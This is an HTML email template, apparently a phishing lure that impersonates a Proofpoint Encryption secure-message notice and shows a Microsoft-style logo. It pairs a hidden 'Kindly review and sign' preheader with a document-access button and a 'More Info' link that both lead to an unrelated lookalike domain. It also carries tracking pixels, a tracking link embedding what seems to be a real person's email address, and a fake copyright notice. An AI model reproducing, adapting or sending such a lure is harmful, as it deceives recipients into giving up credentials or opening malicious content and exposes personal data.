<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- saved from url=(0070)file:///C:/Users/Niceo/Desktop/sortxplace/Proofpoint%20Encryption.html -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
   
  <!-- Branding: You'll probably want to set the title. --> 
  <title>Proofpoint Encryption</title> 
  <meta property="og:title" content="Agreement Contract service">
  <meta property="og:description" content="If you do not see a button or clicking the button yields no action, please click the link in the message.">
  <meta property="og:image" content="http://img.sbc11.net/6749585d2a17777cf9270305/xh2wlRXdTcuWSlHYVnFqkQ/dtinDT2oR56u3ted9xAMRA-eca56c4904354eed5da0debcd6bd66856ab4784d.png">
 </head> 
 <body style="font-size: 14px; font-family: arial; color: #414141;"> 
  <span style="display: none; visibility: hidden; overflow: hidden; opacity: 0; font-size: 0px; line-height: 0px; max-height: 0px; max-width: 0px; mso-hide: all;">Kindly review and sign</span> 
  <table style="width:450px; border-collapse: collapse; margin-left: auto; margin-right: auto;"> 
   <tbody>
    <tr> 
     <td style="padding-top: 20px;"> 
      <table style="padding-top: 10px; padding-left: 10px; padding-right: 10px; padding-bottom: 20px; background-color:#FFFFFF; border:1px solid #CCCCCC; color:#000000; width: 450px;"> 
       <tbody>
        <tr> 
         <td><div style="display: flex; flex-wrap: wrap; width: 45px; height: 45px; margin-right: 9px;">
                    <div style="width: 20px; height: 20px; background-color: #D35B50; margin: 1px;"></div>
                    <div style="width: 20px; height: 20px; background-color: #81BC06; margin: 1px;"></div>
                    <div style="width: 20px; height: 20px; background-color: #0091D3; margin: 1px;"></div>
                    <div style="width: 20px; height: 20px; background-color: #F7A800; margin: 1px;"></div>
                </div>Microsoft</td> 
        </tr> 
        <tr> 
         <td colspan="2" style="padding-top: 20px; text-align: center;"> <a href="https://sharedocs89378file.kgbhealth.com/lion5492694471/" style="font-size: 14px; text-decoration: none; padding: 10px 20px; background-color: #007BFF; color: white; border-radius: 4px; display: inline-block;" target="_blank"> Click to Access Message/Document </a> </td> 
        </tr> 
        <tr> 
         <td colspan="2" style="padding-top: 20px;"> If you do not see a button or clicking the button yields no action, please click the link in the message. </td> 
        </tr> 
        <tr> 
         <td colspan="2" style="font-size: 12px; padding-top: 30px; text-align: center;"> <a href="https://sharedocs89378file.kgbhealth.com/lion5492694471/" style="font: 12px Arial; color: #15428B;" target="_blank">More Info</a> </td> 
        </tr> 
       </tbody>
      </table> </td> 
    </tr> 
    <tr> 
     <td style="font-size: 12px; color: #AAAAAA; padding-top: 10px;"> <b>Disclaimer</b>:&nbsp;
 This email and its content are confidential and intended solely for the
 use of the addressee. Please notify the sender if you have received 
this email in error or simply delete it. </td> 
    </tr> 
    <tr> 
     <td style="font-size: 12px; color: #AAAAAA; padding-top: 10px;"> Secured by <a href="https://eye.sbc11.net/v3/r/USBSHOW/84/6749585d2a17777cf9270305/xh2wlRXdTcuWSlHYVnFqkQ/dtinDT2oR56u3ted9xAMRA/test?email=sample@sample.com&amp;adm=joseph.coghill@mortacious.com" style="font-size: 12px; color: #AAAAAA; padding-top: 10px;">Proofpoint</a> Encryption, Copyright Proofpoint © 2009-2024, Inc. All rights reserved. </td> 
    </tr> 
   </tbody>
  </table> 
  <img src="./index_files/v.gif" border="0" width="1" height="2">
  <img src="./index_files/tt.gif" border="0" width="1" height="4">
  <table width="100%" border="0" cellspacing="0" cellpadding="0">
   <tbody>
    
   </tbody>
  </table>  
 
</body></html>
